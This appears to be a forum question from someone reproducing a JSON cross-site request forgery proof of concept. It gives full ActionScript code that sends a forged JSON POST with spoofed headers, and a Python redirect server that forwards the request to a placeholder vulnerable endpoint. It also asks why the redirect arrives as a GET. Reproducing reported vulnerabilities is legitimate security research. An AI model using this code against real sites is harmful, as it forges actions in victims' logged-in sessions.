0

I was trying to recreate a POC where an endpoint didn't have CSRF protection and was exposing a form submission.

So, I have read these ( before asking here ):

  1. Vimeo hackerone Report by avlidienbrunn
  2. GeekBoy's Article on JSON CSRF
  3. StackOverflow Question : csrf-with-json-post-when-content-type-must-be-application-json
  4. Exploiting CSRF on JSON Endpoints

My Action Script code looks like this : 

package
{
  import flash.display.Sprite;
  import flash.net.URLLoader;
  import flash.net.URLRequest;
  import flash.net.URLRequestHeader;
  import flash.net.URLRequestMethod;

public class csrf extends Sprite
  {
    public function csrf()
    {
      super();
      var member1:Object = null;
      var myJson:String = null;
      member1 = new Object();
      member1 = {
          "user_id":36427093
      };
      var myData:Object = member1;
      myJson = JSON.stringify(myData);
      var url:String = "http://my-server:8000/";
      var request:URLRequest = new URLRequest(url);
      request.requestHeaders.push(new URLRequestHeader("Content-Type","application/json;charset=utf-8"));
      request.requestHeaders.push(new URLRequestHeader("Referer","https://some-vulnerable-endpoint"));
      request.requestHeaders.push(new URLRequestHeader("X-Requested-With","https://some-vulnerable-endpoint"));
      request.data = myJson;
      request.method = URLRequestMethod.POST;
      var urlLoader:URLLoader = new URLLoader();

try
      {
          urlLoader.load(request);
          return;
      }
      catch(e:Error)
      {
          trace(e);
          return;
      }
    }
  }
}

My python pyredirector.py looks like this : 

import BaseHTTPServer
import time
import sys

HOST = '' 
PORT = 8000
vulnerable_endpoint="https://some-vulnerable-endpoint-here"

class RedirectHandler(BaseHTTPServer.BaseHTTPRequestHandler):
  def do_POST(s):
    if s.path == '/csrf.swf':
      s.send_response(200)
      s.send_header("Content-Type","application/x-shockwave-flash")
      s.end_headers()
      s.wfile.write(open("csrf.swf", "rb").read())  # csrf.swf is the filename you compiled the above actionscript to
      return 
    s.send_response(307)
    s.send_header("Location", vulnerable_endpoint)
    s.end_headers()
  def do_GET(s):
    print(s.path)
    s.do_POST()

if __name__ == '__main__':
  server_class = BaseHTTPServer.HTTPServer
  httpd = server_class((HOST,PORT), RedirectHandler)
  print time.asctime(),"Server Starts - %s:%s" % (HOST,PORT)
  try:
    httpd.serve_forever()
  except KeyboardInterrupt:
    pass
  httpd.server_close()
  print time.asctime(),"Server Stops - %s:%s" % (HOST,PORT)

Problem

Now, when I go to http://my-server:8000/, the csrf.swf redirects me to the vulnerable-endpoint but it makes a GET request and so my json payload is dropped and the CSRF doesn't happen.

Although I have the line in ActionScript's code request.method = URLRequestMethod.POST;.

Now, I haven't done coding in ActionScript and nor do I intend to. Seeing the hackerone report and the corresponding video PoC, the reporter's PoC worked just fine ( however it was 4 years back ).

I don't understand why it's forwarding as GET request.

Thanks for bearing with my ignorance and naiveness.
Temporarya

Improve this question
4
  • How did you confirm that it is making a get request instead of a post? Packet Capture? Commented Feb 15, 2019 at 20:26
  • You can see it in Network tab, in Chrome's developer tools option Commented Feb 15, 2019 at 20:35
  • If I'm reading this right when you navigate to my-server:8000 the do_GET(S) runs, which calls do_POST(). If you want to process the initial get as a post then you may need to pass "S" when you call s.do_POST(S) from do_GET() Commented Feb 15, 2019 at 21:23
  • It's self , as you can see in do_GET(), it's taken from the 4th article I mentioned in my post. Commented Feb 15, 2019 at 21:30

0

Reset to default

You must log in to answer this question.

Start asking to get answers

Find the answer to your question by asking.

Ask question

Explore related questions

See similar questions with these tags.